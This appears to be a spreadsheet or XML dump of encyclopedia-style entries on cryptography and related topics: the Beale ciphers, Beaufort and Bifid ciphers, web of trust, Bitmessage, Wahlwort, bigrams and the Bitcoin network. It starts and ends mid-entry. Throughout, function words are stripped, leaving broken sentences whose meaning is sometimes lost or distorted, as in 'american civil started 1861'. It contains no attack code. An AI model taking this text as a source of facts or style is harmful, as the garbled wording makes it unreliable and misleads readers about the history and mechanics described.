pounds gold, twelve hundred eighty-eight silver; also jewels, obtained louis exchange save transportation, valued thirteen thousand dollars. securely packed iron pots, iron covers. vault roughly lined stone, vessels rest solid stone, covered others. paper number describes exact locality vault, difficulty finding second cipher decrypted fairly easily using modified copy united states declaration independence, editing necessary. decrypt finds word corresponding number (e.g., first number 115, 115th word declaration independence "instituted"), takes first letter word case example, "i"). beale used version united states declaration independence slightly different original, made mistakes numbering extract hidden message, following five modifications must applied original text: word ("institute") word ("laying") word must added. pamphlet handles inserting "new government". word ("invariably") word ("design") word must removed (probably "a"). pamphlet's numbering eleven words labels 250. word ("houses") word ("be") words must removed (probably refused long time dissolutions"). pamphlet labels 480. word ("eat") word ("to") word must removed (probably "the"). pamphlet's numbering eleven words labels 640. word ("foreign") word ("valuable") word must removed (probably "their"). pamphlet's numbering eleven words labels 680.furthermore: words ("self-evident"), shown hyphenated, counted words. first letter word ("inalienable") always used ("unalienable"). words modified text ("mean time") counted words, despite shown word. first letter 811th word modified text ("fundamentally") always used beale "y". first letter 1005th word modified text ("have") always used beale "x".finally, decoded text errors, probably wrong transcription original paper: 540, 217, 115, (should 85), consistcd ("consisted"). (should 54), 125, 371, rhousand ("thousand"). (should 220, 106, 353, itron ("in iron"). (should 40), 370, 643, 466, uith ("with"). (should 85), ("the"). 807, (should 95), 405, varlt ("vault").additional declaration differences affect paper number word modified text ("more") shown "now"; words modified text ("fellow citizens") shown hyphenated (also affects paper number extra words ("made" "the") shown modified text positions 1058 1188; word removed ("of") modified text position 1125. slight changes probably consequences. many versions declaration independence printed, various adjustments paragraphing, word inclusion, word changing, spelling, capitalization, punctuation. lack clear images original ciphers, combined large quantity numerals, numerals misprinted omitted many sources. beale papers text, pages gives alleged translation second ciphertext, nine differences actual one. differences shown {alleged decipherment actual decipherment}: deposited, county bedford, four miles buford's, excavation vault, feet surface ground, following articles, belonging jointly parties whose names given number {“3,” three} herewith: first deposit consisted {one thousand hundred} fourteen pounds gold, {three thousand thirty-} eight hundred twelve pounds silver, deposited {november, 1819 nov. eighteen nineteen}. second made {december, 1821 dec. eighteen twenty-one}, consisted nineteen hundred seven pounds gold, twelve hundred eighty-eight {pounds silver; also jewels, obtained louis exchange {for silver save transportation, valued {$13,000 thirteen thousand dollars}. securely packed iron pots, iron covers. vault roughly lined stone, vessels rest solid stone, covered others. paper number {“1” one} describes exact locality vault, difficulty finding translation cipher actual declaration independence shows fact poor spelling: haie deposoted copntt bedoort aboup four miles bulords epcaiation iault fest surlact gtound fotlowing articiss beaonging joiotlt partfes whosl namfs giiet number thrff httewith.." value treasure's total weight tons described inventory second cryptogram. this includes approximately 35,052 troy gold, 61,200 troy silver (worth us$42 us$1 respectively, january 2017) jewels worth around us$220,000 2017. authenticity there considerable debate whether remaining ciphertexts real hoaxes. early researcher, carl hammer sperry univac, used supercomputers late 1960s analyze ciphers found ciphers poorly encoded, undeciphered ones show patterns would expect randomly chosen numbers probably encoded intelligible text. other questions remain authenticity pamphlet's account. words researcher pamphlet story earmarks fake [there was] evidence save word unknown author pamphlet ever papers."the pamphlet's background story several implausibilities, based almost entirely circumstantial evidence hearsay. later cryptographers claimed remaining ciphertexts statistical characteristics suggest actually encryptions english plaintext. alphabetical sequences abcdefghiijklmmnohpp non-random, indicated carl hammer, words english. others also questioned beale would bothered writing three different ciphertexts (with least keys, ciphers) essentially single message first place, particularly wanted ensure next received share treasure described, incentive decode third cipher). analysis language used author pamphlet (the uses punctuation, relative clauses, infinitives, conjunctives, detected significant correlations writing style beale's letters, including plaintext second cipher, suggesting written person. letters also contain several english words, "improvise", otherwise recorded 1820s english used french 1786 orleans area, stampede (spanish) uproar". beale's "stampeding" apparently first appears print english language 1832 used 1786 1823 orleans french spanish. second message, describing treasure, deciphered, others not, suggesting deliberate ploy encourage interest deciphering texts, discover hoaxes. addition, original sale price pamphlet, cents, high price time (adjusted inflation, equivalent $15.08 today), author writes expects wide circulation". third cipher appears short list thirty individuals' next kin. modified declaration independence used first cipher, yields alphabetical sequences abcdefghiijklmmnohpp others. according american cryptogram association, chances sequences appearing multiple times ciphertext chance less hundred million million. although conceivable first cipher intended proof concept letting decoders know right track" subsequent ciphers, proof would redundant, success respect second document would provide evidence own. robert morriss, represented pamphlet, says running washington hotel 1820. contemporary records show start position least 1823. fact common literary device fiction story finding lost treasure edgar allan poe's gold-bug robert louis stevenson treasure island milton caniff's terry pirates.there many attempts break remaining cipher(s). most attempts tried historical texts keys (e.g., magna carta, various books bible, u.s. constitution, virginia royal charter), assuming ciphertexts produced book cipher, none recognized successful date. breaking cipher(s) depend random chance (as, instance, stumbling upon book remaining ciphertexts actually book ciphers); far, even skilled cryptanalysts attempted defeated. course, beale could used document written either remaining keys either document randomly selected characters third source, either case rendering attempts crack codes useless. existence thomas beale survey u.s. census records 1810 shows persons named thomas beale, connecticut hampshire. however, population schedules 1810 u.s. census completely missing seven states, territory, district columbia, counties virginia. 1820 u.s. census persons named thomas beale, captain thomas beale battle orleans 1815 louisiana originally virginia botetourt county fincastle area miles bedford county tennessee, thomas beale virginia, population schedules completely missing three states territory. before 1850 u.s. census recorded names heads households; others household counted. beale, existed, living someone else's household.in addition, named "thomas beall" appears customer lists louis post department 1820. according pamphlet, beale sent letter louis 1822.additionally, cheyenne legend exists gold silver taken west buried mountains east, dating roughly 1820. poe's alleged authorship edgar allan suggested pamphlet's real author interest cryptography. well known placed notices abilities philadelphia paper alexander's weekly (express) messenger, inviting submissions ciphers proceeded solve. 1843 used cryptogram plot device short story "the gold-bug". from 1820, also living richmond, virginia time beale's alleged encounters morriss. february 1826 enrolled student university virginia charlottesville. mounting debts, left boston april 1827.however, research facts debunk poe's authorship. died 1849, well beale papers first published 1885. pamphlet also mentions american civil started 1861. william poundstone, american author skeptic, stylometric analysis performed pamphlet 1983 book biggest secrets, found poe's prose significantly different grammatical structure used author wrote beale papers. statistical analysis another method check validity ciphers investigate statistical aspects different number bases. example, investigate frequency last digit number ciphers. these frequencies uniformly distributed digits common others. this true three ciphers.however, considers base relatively prime last digits numbers unsolved ciphers turn uniform digit equally common. frequency solved cipher stays non-uniform. this indicates complex behaviour solved cipher might expect encoded message, unsolved ciphers simpler behaviour. humans limited abilities comes generating random numbers thin air. explanation difference base ones numbers produced human base would mean ciphers fraudulent. search attempts despite beale papers' unproven veracity, treasure hunters deterred trying find vault. "information" buried treasure bedford county stimulated many expeditions shovels, implements discovery, looking likely spots. hundred years, people arrested trespassing unauthorized digging; groups case people pennsylvania 1990s.several digs completed porter's mountain, late 1980s land owner's permission long treasure found split 50/50. however, treasure hunters found civil artifacts. value artifacts paid time equipment rental, expedition broke even. media attention story subject multiple television documentaries, uk's mysteries series, segment seventh special unsolved mysteries; 2011 declaration independence episode history channel show brad meltzer's decoded. there also several books, considerable internet activity. 2014, national geographic show numbers game referred beale ciphers strongest passwords ever created. 2015 uktv series myth hunters (also known raiders lost past) devoted season episodes topic. also 2015, josh gates series expedition unknown visited bedford investigate beale ciphers search treasure. simon singh's 1999 book code book explains beale cipher mystery chapters.in 2010, award-winning animated short film made concerning ciphers called thomas beale cipher. also list ciphertexts rennes-le-château similar case encrypted documents, discovered church france, allegedly refer hidden treasure island mystery alleged undiscovered buried treasure island nova scotia captain kidd 17th-century pirate supposed left behind clues buried treasure treasure lima another legendary lost treasure lost dutchman's gold mine legendary lost treasure references further reading viemeister, peter. beale treasure: history mystery, 1997. published hamilton's, bedford, virginia gillogly, james "the beale cipher: dissenting opinion april 1980 cryptologia, volume number easterling, e.j. search golden vault: beale treasure mystery cd/audio book min. copyright 1995/ revised 2011 avenel publishing 1122 easter lane blue ridge, 24064. external links "the beale papers wikisource"., text separate pages, shown alongside images original. "the beale papers". archived original 2021-12-12. made video format audio whole pamphlet. "the legendary beale treasure". "the making "mysteries"". "the quest break america's most mysterious code find million buried treasure". thomas beale cipher imdb dunning, brian (march 2012). "skeptoid #301: beale ciphers". skeptoid. "historical analytical studies relation beale ciphers"</t>
  </si>
  <si>
    <t>Beaufort cipher</t>
  </si>
  <si>
    <t>beaufort cipher, created francis beaufort, substitution cipher similar vigenère cipher, slightly modified enciphering mechanism tableau. famous application rotor-based cipher machine, hagelin m-209. beaufort cipher based beaufort square essentially vigenère square reverse order starting letter first row, first last column serve purpose. using cipher encrypt, first choose plaintext character tableau; call column secondly, travel column corresponding letter finally, move directly left letter left edge tableau, ciphertext encryption plaintext there. example encrypting plain text character steps would find column top, travel column find "m", travel left edge tableau find ciphertext letter ("k" case).to decrypt, process reversed. unlike otherwise similar vigenère cipher, beaufort cipher reciprocal cipher, decryption encryption algorithms same. this obviously reduces errors handling table makes useful encrypting larger volumes messages hand, example manual diana crypto system, used u.s. special forces vietnam (compare diana-table image). example column would find reciprocal ciphertext "k". true decryption ciphertext combined results plaintext well combining results "m". this results "trigram" combinations parts suffice identify third. after eliminating identical trigrams initial combinations remain (see below) could memorized order (e.g. memorized "man" "pic") speed encoding decoding. algebraic description beaufort cipher described algebraically. example, using encoding letters numbers 0–25 using addition modulo {\displaystyle m=m_{1}\dots m_{n}} characters message, {\displaystyle c=c_{1}\dots c_{n}} characters cipher text {\displaystyle k=k_{1}\dots k_{n}} characters key, repeated necessary. then beaufort encryption {\displaystyle written, {\displaystyle c_{i}=e_{k}(m_{i})=(k_{i}-m_{i})\mod {26}} .similarly, decryption {\displaystyle using {\displaystyle {\displaystyle m_{i}=d_{k}(c_{i})=(k_{i}-c_{i})\mod {26}} decrypting vigenere cipher similarities beaufort cipher vigenère cipher possible, applying transformation, solve vigenère cipher. replacing every letter ciphertext opposite letter (such becomes 'z', becomes etc.; i.e. atbash-transformation) solved like vigenère cipher. distinguished 'variant beaufort' beaufort cipher confused "variant beaufort" cipher. variant beaufort, encryption performed performing decryption step standard vigenère cipher, likewise decryption performed using vigenère encryption. references</t>
  </si>
  <si>
    <t>Web of trust</t>
  </si>
  <si>
    <t>cryptography, trust concept used pgp, gnupg, openpgp-compatible systems establish authenticity binding public owner. decentralized trust model alternative centralized trust model public infrastructure (pki), relies exclusively certificate authority hierarchy such). computer networks, many independent webs trust, user (through public certificate) part link between, multiple webs. trust concept first forth creator phil zimmermann 1992 manual version 2.0: time goes accumulate keys people want designate trusted introducers. everyone else choose trusted introducers. everyone gradually accumulate distribute collection certifying signatures people, expectation anyone receiving trust least signatures. this cause emergence decentralized fault-tolerant confidence public keys. note word emergence context. trust makes concept emergence. operation trust openpgp-compliant implementations include certificate vetting scheme assist this; operation termed trust. openpgp certificates (which include public keys along owner information) digitally signed users who, act, endorse association public person entity listed certificate. this commonly done signing parties.openpgp-compliant implementations also include vote counting scheme used determine public owner association user trust using pgp. instance, three partially trusted endorsers vouched certificate (and included public owner binding), fully trusted endorser done association owner public certificate trusted correct. parameters user-adjustable (e.g., partials all, perhaps partials) completely bypassed desired. scheme flexible, unlike public infrastructure designs, leaves trust decisions hands individual users. perfect requires caution intelligent supervision users. essentially designs less flexible require users follow trust endorsement generated, certificate authority (ca)-signed, certificates. simplified explanation there keys pertaining person: public shared openly private withheld owner. owner's private decrypt information encrypted public key. trust, user ring group people's public keys. users encrypt information recipient's public key, recipient's private decrypt each user digitally signs information private recipient verifies user's public key, confirm user question. doing ensure information came specific user tampered with, intended recipient read information (because know private key). contrast typical unlike wot, typical x.509 enables certificate signed single party: certificate authority (ca). ca's certificate signed different 'self-signed' root certificate. root certificates must available lower-level certificate typically distributed widely. they instance, distributed applications browsers email clients. ssl/tls-protected pages, email messages, etc. authenticated without requiring users manually install root certificates. applications commonly include hundred root certificates dozens pkis, thus default bestowing trust throughout hierarchy certificates lead back them. favors decentralization trust anchors prevent single point failure compromising hierarchy. notable project uses provide framework authentication areas internet monkeysphere utilities. problems loss private keys openpgp trust essentially unaffected things company failures, continued function little change. however, related problem occur: users, whether individuals organizations, lose track private longer decrypt messages sent produced using matching public found openpgp certificate. early certificates include expiry dates, certificates unlimited lives. users prepare signed cancellation certificate time matching private lost compromised. prominent cryptographer still getting messages encrypted using public long lost track private key. they can't much messages except discard notifying sender unreadable requesting resending public still matching private key. later pgp, openpgp compliant certificates include expiry dates automatically preclude troubles (eventually) used sensibly. this problem also easily avoided "designated revokers", introduced early 1990s. owner designate third party permission revoke owner's case owner loses private thus loses ability revoke public key). public authenticity check non-technical, social difficulty trust like built pgp/openpgp type systems every trust without central controller (e.g., depends users trust. those certificates (i.e., produced process generating pair) likely readily trusted users' systems, personally met, find enough endorsements certificate. this many trust users certificate vetting require fully trusted endorsers otherwise unknown certificate perhaps several partial endorsers) using public certificate prepare messages, believe signatures, etc. despite wide openpgp compliant systems easy availability on-line multiple servers, possible practice unable readily find someone several people) endorse certificate (e.g., comparing physical identification owner information digitally signing certificate). users remote areas undeveloped ones, instance, find users scarce. and, other's certificate also (and endorsements others), signature certificate offer marginal benefit toward becoming trusted still parties' systems able securely exchange messages them. signing parties relatively popular mechanism resolve problem finding users install one's certificate existing webs trust endorsing websites also exist facilitate location openpgp users arrange keysignings. gossamer spider trust also makes verification easier linking openpgp users hierarchical style trust users benefit coincidental determined trust someone endorsed introducer, explicitly trusting gswot's top-level minimally level introducer (the top-level endorses level introducers). possibility finding chains certificates often justified "small world phenomenon": given individuals, often possible find short chain people person chain knows preceding following links. however, chain necessarily useful: person encrypting email verifying signature find chain signatures private correspondent's, also trust person chain honest competent signing keys (that judge whether people likely honestly follow guidelines verifying identity people signing keys). this much stronger constraint. another obstacle requirement physically meet someone (for example, signing party) verify identity ownership public email address, involve travel expenses scheduling constraints affecting sides. software user need verify hundreds software components produced thousands developers located around world. general population software users cannot meet person software developers establish direct trust, must instead rely comparatively slower propagation indirect trust.obtaining pgp/gpg author developer, publisher, etc.) public server also presents risks, since server third-party middle-man, vulnerable abuse attacks. avoid risk, author instead choose publish public server (i.e., server accessible domain name owned them, securely located private office home) require hkps-encrypted connections transmission public key. details, assisting solutions below. strong strong refers largest collection strongly connected keys. this forms basis global trust. keys strong path them; islands sets keys sign disconnected group exist, member group needs exchange signatures strong group also become part strong set. strong size 55000 keys beginning year 2015. mean shortest distance statistical analysis pgp/gnupg/openpgp trust mean shortest distance (msd) measurement "trusted" given within strongly connected keys make trust. become common metric analysis sets keys. very often calculated given subset keys compared global generally refers keys ranking within larger analyses global trust. assisting solutions physically meeting original developer author, always best obtain distribute verify trust pgp/gpg keys highest trust level, remain best level best trustworthy way. publishing gpg/pgp full full fingerprint on/with widely known (physical/paper-material based) book, original author/developer, best form sharing trustworthy users. before meeting developer author, users research developer author book library internet, aware developer's author's photo, work, pub-key fingerprint, email-address, etc. however, practical millions users want communicate message securely physically meet recipient users, also practical millions software users need physically meet hundreds software developers authors, whose software file signing pgp/gpg public want verify trust ultimately computers. therefore, trusted third-party authority (ttpa) type entity group need available users usable users, entity/group need capable providing trusted-verification trust-delegation services millions users around world, time. practically, verify downloaded received content data email file's authenticity, user need verify downloaded main content main data/email main file's pgp/gpg signature code/file (asc, sig). users would need original developer's original author's trustworthy verified public-key, users would need trustworthy file-signing public-key trusted-by original owner public-key. really trust specific pgp/gpg key, users would need physically meet every specific original author developer, users would need physically meet original-releaser file-signing pub-key, users would need find another alternative trustworthy user, trusted-chain (aka, another user another developer another author, trusted specific original author developer), physically meet person, verify real his/her pgp/gpg (and also provide user, side sign/certify trust other's pgp/gpg key). whether software popular not, software users usually located around world different locations. physically possible original author developer file-releaser provide public-key trust verification services millions users. neither practical millions software users physically meet every software every software-library every piece code's developer author releaser, (use need computers. even multiple trusted people/person original-author) trusted-chain wot, still physically practically possible every developer author meet every users, also possible every users meet hundreds developers whose software using working when decentralized hierarchy based chain model become popular used nearby users, physical meeting pub-key certify sign procedure easier. solutions are: original author/developer need first trust-level sign/certify file-signing key. then updated public-keys updated file-signing public-keys must also published distributed made accessible) users, online secure encrypted mediums, user location world, correct trusted unmodified public-key. make sure users getting correct trusted public-keys signed-code/file, original dev/author original-releaser must publish updated public-keys server force hkps encrypted connection usage, publish updated full public-keys (and signed-code/file) https encrypted webpage, server, primary domain website, (not-from sub-domains located external-servers, not-from mirror, not-from external/shared forum/wiki website servers, not-from public external/shared cloud hosting service servers), must located kept securely inside premises: own-home, own-home-office, own-office. way, small pieces original keys/code, travel intact internet remain unmodified transit (because encrypted connection) reach destination without eavesdropped modified, user's side, treated trustworthy public-keys single multi channel ttpa based verification. when public-key obtained (from original developer's web-server) ttpa (trusted third party authority) based secured, verified encrypted connection, trustworthy. when original public-keys/signed-codes shown original dev's author's server server, encrypted connection encrypted webpage, files, data content transferred type non-encrypted connection, like: http/ftp sub-domain server mirror shared cloud/hosting servers, because, non-encrypted connection based downloaded items/data/files authenticated later, using original public-keys/signed-codes, obtained original author's/developer's server secured, encrypted, trusted (aka, verified) connection/channels. using encrypted connection transfer keys signed/signature code/files, allow software users delegate trust ttpa (trusted third party authority), like public (certificate authority), help providing trusted connection original developer/author's server, millions worldwide users' computers, time. when original author/developer's domain-name name-server signed dnssec, used ssl/tls public certificate declared/shown tlsa/dane dnssec resource-record, (and ssl/tls certs trust chain pinned used hpkp technique servers), web-server's webpage data also verified another ttpa: dnssec namespace maintainer icann, public dnssec another form pgp/gpg name-servers; creates trusted-chain name-servers first (instead people/person), people/person's pgp/gpg keys fingerprints also added server's dnssec records. users want communicate securely software users), effectively get/receive data/key/code/webpage etc. verified (aka, authenticated) (aka, dual/double) trusted ttpas/channels time: icann (dnssec) (ssl/tls certificate). pgp/gpg key/signed-code data file) trusted, solutions techniques used: hkps, hkps+dnssec+dane, https, https+hpkp https+hpkp+dnssec+dane. vast number user's group create based dnssec registry, users (along icann-dnssec) root-key local dnssec-based resolver/server, domain-owners also additional signing domain-names, third ttpa. case, pgp/gpg key/signed-code data webpage data three/triple-channel verified. isc's used third ttpa still used widely active, availability another become fourth ttpa. also friend-to-friend (f2f) computer network. self-sovereign identity thawte stopped signing openpgp keys many years issues x.509 certificates. virtual community references further reading ferguson, niels; bruce schneier (2003). practical cryptography. john wiley sons. isbn 0-471-22357-3. external links explanation trust analysis strong trust, longer maintained; last archived link august 2020.</t>
  </si>
  <si>
    <t>Bitmessage</t>
  </si>
  <si>
    <t>bitmessage decentralized, encrypted, peer-to-peer, trustless communications protocol used person send encrypted messages another person, multiple subscribers. june 2013, software experienced surge adoptions news reports email surveillance national security agency.bitmessage conceived software developer jonathan warren, based design decentralized digital currency, bitcoin. software released november 2012 license.bitmessage gained reputation reach warrantless wiretapping conducted national security agency (nsa), decentralized nature protocol, encryption difficult crack. result, downloads bitmessage program increased fivefold june 2013, news broke classified email surveillance activities conducted nsa.bitmessage also mentioned experimental alternative email popular science cnet.some ransomware programs instruct affected users bitmessage communicate attackers.pybitmessage version 0.6.2 (march 2017) remote code execution vulnerability. fixed version 0.6.3 (february 2018). references further reading bitmessage: peer‐to‐peer message authentication delivery system (jonathan warren) bitmessage white paper external links official website</t>
  </si>
  <si>
    <t>Bicycle locker</t>
  </si>
  <si>
    <t>bicycle locker bike locker bicycles placed locked. they usually provided places numerous cyclists need bike parking extended times (such working day), bikes might otherwise damaged stolen (such public terminals). bicycle lockers considered highest standard bike safety (better locked compounds simple bike stands) prevent theft, shelter bicycles weather, deter casual vandalism. shapes lockers usually either rectangular boxes formed triangles handlebars bicycle wide side triangle. bicycle lockers support bicycles diagonal partition allowing dual-sided access. triangle wedged shaped lockers also combined form rectangular individual lockers facing back back. they also arranged circular pattern around center point fanning corner. some lockers also installed straight line standing shoulder shoulder. some rarer types either upright like school lockers (which requires bicycle suspended hook inside) stacked twice high, attendant difficulties inserting removing bikes row. bike lockers usually built solid sides protect weather, vandalism, theft. however, problems encountered approach (such used homeless people sleepouts, storage things bicycles) newer designs incorporate windows grilles inspection staff inside. locks bike locker locks depend whether boxes rented fixed period basis, whether first-come-first served. those rented period time usually come specific key. those usable casual basis either allow door locked padlock brought along user, provide rental system dispenses code.statistics bart rail system suggest effective capacity on-demand locker bank times higher similar sized exclusive locker bank. automated lockers automated bicycle parking becoming common europe. these systems often store bikes underground usually function users using microchip card personal code store retrieve bicycles.one mechanized system bike tree. when user presents access card, motor lowers hook "tree". front wheel cycle attached hook, motor returns hook tree. system pioneered bicycle tree international, headquartered geneva, switzerland, company however since ceased operations. engineering japan produce system called cycle tree; installation kasai station bicycle parking tokyo space 6,480 bicycles, largest underground mechanical bicycle parking system world. another advanced automated bicycle parking system uses rotary lift system integrated small towers. there bicycle lockers tower small foot print area. system pioneered v-locker dübendorf near zurich. with (internet things) smart bicycle locker solutions emerging. cyclist administrate parking his/her phone. safebikely norway delivers lockers several norwegian cities also bicycle parking bicycle stand bicycle theft bicycle tree sucker pole references</t>
  </si>
  <si>
    <t>Wadsworth's cipher</t>
  </si>
  <si>
    <t>wadsworth's cipher, wheatstone's cipher, cipher invented decius wadsworth, colonel ordnance corps united states army. 1817, developed progressive cipher system based 1790 design thomas jefferson, establishing method continuously improved upon used world wadsworth's system involved disks, inside other, outer disk letters alphabet numbers 2-8, inner disk letters. disks geared together ratio 26:33. encipher message, inner disk turned desired letter position, number turns required result transmitted ciphertext. gearing, ciphertext substitution character repeat characters plaintext letter used. similar device invented charles wheatstone several years wadsworth. references short history cryptography", fred cohen, 1995 "cryptography primer", jose mari reyes, 2001 "cryptography timeline", carl ellison, december 2004 codes, richard mollin, 2005</t>
  </si>
  <si>
    <t>Wahlwort</t>
  </si>
  <si>
    <t>wahlwort (nonsense word filler) cryptographic term used particularly connection wehrmacht, used wahlworts enigma rotor machine encryption communication world term describes randomly selected word inserted beginning radiogram plaintext. wahlwort intended hinder enemy’s cryptanalysis prevent decryption ciphertext. application according secret regulations force time, outlined schlüssel verfahren allgemein (the cipher general procedure), procedure used primarily give radio messages different lengths (“cipher refers enigma naval variant series enigma machines). indeed, plaintexts content often transmitted different receiving operators encrypted form. encrypted different keys corresponding different encryption networks. this resulted ciphertexts different, length. enemy noticed different ciphertexts similar length approximately time, possibly transmitting operator, receiving operator would assume known-ciphertext-attack taking place. british codebreakers english bletchley park familiar cases glad receive them, naming kiss. such kiss considered ideal opportunity decipher radio messages, even better “crib,” deciphered text section. introducing wahlworts different lengths beginning sentence, sometimes beginning end, length messages differ, prevented least hindered enemy accessing length wahlwort usually four fourteen letters. german code book gave examples; “wassereimer (bucket), fernsprecher (telephone), eichbaum (oak tree), dachfirst (roof ridge), kleiderschrank (wardrobe).” wahlworts three letters occasionally appeared code, xxx, also long compounds, donaudampfschiffahrtsgesellschaftskapitän (danube steamboating association captain) hottentottenpotentatentantenattentäter (hottentot potentate aunt assassin rationale choosing less meaningful german words wahlworts (specifically compound nouns) opposed random text cihjt uuhml, authorized recipient could verify deciphering radio message error-free. however, according regulations, wahlworts required entirely unrelated content actual radio message, “infringe discipline order.”wahlworts also used conjunction ciphering machines geheimschreiber (secret teleprinter) siemens halske t52.“introduced 1940 wholesale scale, wahlworts might knocked infant crib room properly feet.” results introduction wahlworts, first observed british 1942 north africa, impeded codebreaker's work. however, time british well acquainted german methods stopping continued success code-breaking, despite wahlworts. nuisance various possibilities pertaining word order text know length wahlworts, could stop deciphering text. post-war british review german wahlwort method revealed practice "too little late". german measures attempting strengthen cryptographic security enigma, example introduction cryptographically strong methods enigma (clock), pluggable (nick-named uncle dick british), wahlworts failed introduced comprehensively adopted late war. literature john jackson: solving enigma’s secrets official history bletchley park’s booktower publishing 2014, 211–216, isbn 978-0-9557164-3-0 tony sale: bletchley park 1944 cryptographic dictionary. publikation, bletchley park, 2001, pdf; abgerufen august 2018. external links schlüssel (german) cipher (pdf; mb), scan german original regulations 1940, accessed august 2018. 1944 bletchley park cryptographic dictionary “wahlwort” b.p. cryptographic dictionary, accessed august 2018. references</t>
  </si>
  <si>
    <t>Bifid cipher</t>
  </si>
  <si>
    <t>classical cryptography, bifid cipher cipher combines polybius square transposition, uses fractionation achieve diffusion. invented around 1901 felix delastelle. operation first, mixed alphabet polybius square drawn share position: message converted coordinates usual manner, written vertically beneath: they read rows: then divided pairs again, pairs turned back letters using square: way, ciphertext character depends plaintext characters, bifid digraphic cipher, like playfair cipher. decrypt, procedure simply reversed. longer messages first broken blocks fixed length, called period, encryption procedure applied block. detect period uses bigram statistics ciphertext letters separated half period. even periods, ciphertext letters distance influenced plaintext letters, periods, ciphertext letters distances (rounded either down) influenced three plaintext letters. thus, periods secure even form cryptanalysis, would require text find statistical anomaly trigram plaintext statistics bigram plaintext statistics. also other ciphers delastelle: four-square cipher (related playfair) trifid cipher (similar bifid) references external links online bifid encipherer/decipherer polybius square generator</t>
  </si>
  <si>
    <t>Bigram</t>
  </si>
  <si>
    <t>bigram digram sequence adjacent elements string tokens, typically letters, syllables, words. bigram n-gram n=2. frequency distribution every bigram string commonly used simple statistical analysis text many applications, including computational linguistics, cryptography, speech recognition, gappy bigrams skipping bigrams word pairs allow gaps (perhaps avoiding connecting words, allowing simulation dependencies, dependency grammar). head word bigrams gappy bigrams explicit dependency relationship. details bigrams help provide conditional probability token given preceding token, relation conditional probability applied: {\displaystyle p(w_{n}|w_{n-1})={p(w_{n-1},w_{n}) \over p(w_{n-1})}} that probability {\displaystyle p()} token {\displaystyle w_{n}} given preceding token {\displaystyle w_{n-1}} equal probability bigram, co-occurrence tokens {\displaystyle p(w_{n-1},w_{n})} divided probability preceding token. applications bigrams used successful language models speech recognition. they special case n-gram. bigram frequency attacks used cryptography solve cryptograms. frequency analysis. bigram frequency approach statistical language identification. some activities logology recreational linguistics involve bigrams. these include attempts find english words beginning every possible bigram, words containing string repeated bigrams, logogogue. bigram frequency english language frequency common letter bigrams small english corpus 1.52 0.55 0.18 1.28 0.53 0.16 0.94 0.52 0.09 0.94 0.50 0.09 0.82 0.50 0.08 0.68 0.47 0.08 0.63 0.46 0.06 0.59 0.46 0.05 0.57 0.43 0.04 0.56 0.34 0.04 0.56 0.33 0.04 0.56 0.27 0.02 0.55 0.19 0.02 complete bigram frequencies larger corpus available. also digraph (orthography) n-gram letter frequency sørensen–dice coefficient references</t>
  </si>
  <si>
    <t>Bitcoin network</t>
  </si>
  <si>
    <t>bitcoin network peer-to-peer payment network operates cryptographic protocol. users send receive bitcoins, units currency, broadcasting digitally signed messages network using bitcoin cryptocurrency wallet software. transactions recorded distributed, replicated public database known blockchain, consensus achieved proof-of-work system called mining. satoshi nakamoto, designer bitcoin, claimed design coding bitcoin began 2007. project released 2009 open source software. network requires minimal structure share transactions. decentralized network volunteers sufficient. messages broadcast best-effort basis, nodes leave rejoin network will. upon reconnection, node downloads verifies blocks nodes complete local copy blockchain. transactions bitcoin defined sequence digitally signed transactions began bitcoin's creation, block reward. owner bitcoin transfers digitally signing next owner using bitcoin transaction, much like endorsing traditional bank check. payee examine previous transaction verify chain ownership. unlike traditional check endorsements, bitcoin transactions irreversible, eliminates risk chargeback fraud. although possible handle bitcoins individually, would unwieldy require separate transaction every bitcoin transaction. transactions therefore allowed contain multiple inputs outputs, allowing bitcoins split combined. common transactions either single input larger previous transaction multiple inputs combining smaller amounts, outputs: payment, returning change, any, sender. difference total input output amounts transaction goes miners transaction fee. mining form distributed timestamp server peer-to-peer network, bitcoin uses proof-of-work system. this work often called bitcoin mining. during mining, practically entire computing power bitcoin network used solve cryptographic tasks, proof work. their purpose ensure generation valid blocks involves certain amount effort, subsequent modification block chain, attack scenario, practically ruled out. because difficulty, miners form "mining pools" payouts despite high power requirements, costly hardware deployments, and/or hardware control. largest proportion mining pools based china, also miners computing power cryptocurrency based.requiring proof work accept block blockchain satoshi nakamoto's innovation. mining process involves identifying block that, hashed twice sha-256, yields number smaller given difficulty target. while average work required increases inverse proportion difficulty target, hash always verified executing single round double sha-256. bitcoin timestamp network, valid proof work found incrementing nonce value found gives block's hash required number leading zero bits. once hashing produced valid result, block cannot changed without redoing work. later blocks chained work change block would include redoing work subsequent block. deviation consensus blockchain fork occur. majority consensus bitcoin represented longest chain, required greatest amount effort produce. majority computing power controlled honest nodes, honest chain grow fastest outpace competing chains. modify past block, attacker would redo proof-of-work block blocks surpass work honest nodes. probability slower attacker catching diminishes exponentially subsequent blocks added. compensate increasing hardware speed varying interest running nodes time, difficulty finding valid hash adjusted roughly every weeks. blocks generated quickly, difficulty increases hashes required make block generate bitcoins. difficulty mining pools bitcoin mining competitive endeavor. "arms race" observed various hashing technologies used mine bitcoins: basic central processing units (cpus), high-end graphics processing units (gpus), field-programmable gate arrays (fpgas) application-specific integrated circuits (asics) used, reducing profitability less-specialized technology. bitcoin-specific asics primary method mining bitcoin surpassed speed much 300-fold. difficulty within mining process involves self-adjusting network's accumulated mining power. bitcoins become difficult mine, computer hardware manufacturing companies seen increase sales high-end asic products.computing power often bundled together "pooled" reduce variance miner income. individual mining rigs often wait long periods confirm block transactions receive payment. pool, participating miners paid every time participating server solves block. this payment depends amount work individual miner contributed help find block. energy sources consumption 2013, mark gimein estimated electricity consumption 40.9 megawatts (982 megawatt-hours day). 2014, hass mccook estimated 80.7 megawatts (80,666 kw). 2015, economist estimated even miners used modern facilities, combined electricity consumption would 166.7 megawatts (1.46 terawatt-hours year). cambridge bitcoin electricity consumption index estimates energy bitcoin network grew 1.95 terawatt-hours year 2014, 77.1 terawatt-hours year 2019.seeking lower electricity costs, bitcoin miners places like iceland geothermal energy cheap cooling arctic free. chinese bitcoin miners known hydroelectric power tibet reduce electricity costs. north american companies utilizing stranded cost-effective source energy bitcoin mining. west texas, wind powers bitcoin mining. april 2021, least one-third bitcoin mining powered coal china's xinjiang region.a 2021 study found carbon emissions bitcoin mining china majority proof-of-work algorithm generated economic value computed prior mid-2021 accelerated rapidly late 2010s, largely fueled nonrenewable sources expected exceed total annual emissions countries like italy spain 2016, interfering international climate change mitigation commitments. also found 2021, bitcoin mining consumed energy country zealand. formal chinese cryptocurrency mining operations 2021—reiterated september november—resulted relocation large majority mining equipment away china. many percent "all world's 